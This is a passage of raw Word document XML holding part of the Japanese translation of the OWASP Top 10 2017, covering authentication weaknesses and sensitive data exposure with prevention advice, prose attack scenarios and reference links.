        <w:t xml:space="preserve">アカウント列挙攻撃への対策としてユーザ登録、パスワード復旧、APIを強化するため、すべての結果表示において同じメッセージを用いる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">サーバサイドで、セキュアな、ビルトインのセッション管理機構を使い、ログイン後には新たに高エントロピーのランダムなセッションIDを生成する。セッションIDはURLに含めるべきではなく、セキュアに保存する。また、ログアウト後や、アイドル状態、タイムアウトしたセッションを無効にする。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="109" w:name="攻撃シナリオの例-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId103">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">アカウントリスト攻撃</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">や</w:t>
      </w:r>
      <w:hyperlink r:id="rId108">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">よく知られたパスワードのリスト</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を用いた攻撃は、広く知られた攻撃手法です。アプリケーションに自動化された攻撃やアカウントリスト攻撃の対策が実装されていないなら、そのアプリケーションは「強力なパスワード検証ツール」として認証情報が有効かどうかを調べるのに悪用されかねません。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ほとんどの認証に関連する攻撃は、パスワードを唯一の認証要素として使い続けてきたために発生しています。かつてベストプラクティスとされてきたパスワードの定期変更や複雑性の要求は、ユーザーに弱いパスワードを繰り返し使うよう促すとの見方があります。そこで、あらゆる組織がNIST 800-63に従ってこのようなプラクティスをやめ、多要素認証を使うことが推奨されています。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="123" w:name="参考資料-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="119" w:name="owasp-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId110">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Implement Identity and Authentication Controls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId111">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP ASVS: V2 Authentication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId112">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">V3 Session Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId113">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Identity</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">と</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId114">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId115">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId116">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Credential Stuffing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId117">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Forgot Password</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId118">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Session Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId93">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Automated Threats Handbook</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="122" w:name="外部資料-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId106">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">NIST 800-63b: 5.1.1 Memorized Secrets</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId120">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-287: Improper Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId121">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-384: Session Fixation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="154" w:name="a32017-機微な情報の露出"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A3:2017-機微な情報の露出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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">蔓延度 3 : 検出のしやすさ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">技術面への影響 3 : ビジネス面への影響</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ここ数年以降、このリスクはもっとも一般的で影響力のある攻撃になりました。もっとも一般的な攻撃手法は、暗号化されていない機微な情報を狙ったものです。暗号化されている場合でも、弱い暗号鍵の生成と管理、弱い暗号アルゴリズム、プロトコル、暗号スイートの利用を狙った攻撃手法が知られています。特に、弱いハッシュ関数によるパスワードハッシュを狙った攻撃がよく知られています。データを送信する場合には、サーバサイドの弱点を容易に検知できますが、サーバ内に保存したデータの問題の検知は困難です。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">保護に失敗し保護すべきすべての情報が台無しになることは頻繁に生じています。多くの場合、これらの情報には健康記録、認証情報、個人情報、クレジットカードなどの機微な情報(PII)が含まれています。これらのデータについてはしばしば、EUにおけるGDPRや各地域のプライバシー関連の法律など、法律や規則で定められた保護が要求されます。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="128" w:name="脆弱性発見のポイント-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">脆弱性発見のポイント</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">まず、送信あるいは保存するデータが保護を必要とするか見極めます。例えば、パスワード、クレジットカード番号、健康記録、個人データやビジネス上の機密は特に保護する必要があります。データに対して、EUの一般データ保護規則(GDPR)のようなプライバシー関連の法律が適用される場合、また、PCIデータセキュリティスタンダード(PCI DSS)など金融の情報保護の要求があるような規定がある場合には、特に注意が必要です。そのようなデータすべてについて、以下を確認してください:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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の通信もすべて確認する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">バックアップも含め、機密データを平文で保存していないか。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">古いまたは弱い暗号アルゴリズムを初期設定のまま、または古いコードで使っていないか。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">初期値のままの暗号鍵の使用、弱い暗号鍵を生成または再利用、適切な暗号鍵管理または鍵のローテーションをしていない、これらの該当する箇所はないか。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ユーザエージェント（ブラウザ）のセキュリティに関するディレクティブやヘッダーが欠落しているなど、暗号化が強制されていない箇所はないか。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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25">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Crypto (V6)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:hyperlink r:id="rId126">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Data Protection (V8)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、そして</w:t>
      </w:r>
      <w:hyperlink r:id="rId127">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SSL/TLS (V9)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を参照。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="134" w:name="防止方法-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">防止方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">最低限実施すべきことを以下に挙げます。そして、参考資料を検討してください:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">前述の分類をもとにアクセス制御を実装する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">必要のない機微な情報を保存しない。できる限りすぐにそのような機微な情報を破棄するか、PCI DSSに準拠したトークナイゼーションまたはトランケーションを行う。データが残っていなければ盗まれない。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">保存時にすべての機微な情報を暗号化しているか確認する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">最新の暗号強度の高い標準アルゴリズム、プロトコル、暗号鍵を実装しているか確認する。そして適切に暗号鍵を管理する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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w:t>
      </w:r>
      <w:hyperlink r:id="rId129">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">HSTS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)のようなディレクティブで暗号化を強制する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">パスワードを保存する際、</w:t>
      </w:r>
      <w:hyperlink r:id="rId130">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Argon2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:hyperlink r:id="rId131">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">scrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId132">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">bcrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:hyperlink r:id="rId133">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">PBKDF2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">のようなワークファクタ(遅延ファクタ)のある、強くかつ適応可能なレベルのソルト付きハッシュ関数を用いる。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">設定とその設定値がそれぞれ独立して効果があるか検証する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="135" w:name="攻撃シナリオの例-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻撃シナリオの例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>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Cs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">シナリオ #2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: あるサイトは、すべてのページでTLSを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Cs/>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bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="153" w:name="参考資料-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">参考資料</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="143" w:name="owasp-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId136">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Proactive Controls: Protect Data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Verification Standard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId125">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">V6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId126">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId127">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId137">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Transport Layer Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId138">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: User Privacy Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId139">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Cheat Sheet: Password</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">と</w:t>
      </w:r>
      <w:hyperlink r:id="rId140">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Cryptographic Storage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId141">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Security Headers Project</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId129">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Cheat Sheet: HSTS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId142">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Testing Guide: Testing for weak cryptography</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkStart w:id="152" w:name="外部資料-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">外部資料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId144">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-220: Exposure of sens. information through data queries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId145">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-310: Cryptographic Issues</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId146">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-311: Missing Encryption</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId147">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-312: Cleartext Storage of Sensitive Information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId148">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-319: Cleartext Transmission of Sensitive Information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId149">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-326: Weak Encryption</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId150">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-327: Broken/Risky Crypto</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId151">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-359: Exposure of Private Information - Privacy Violation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkEnd w:id="154"/>
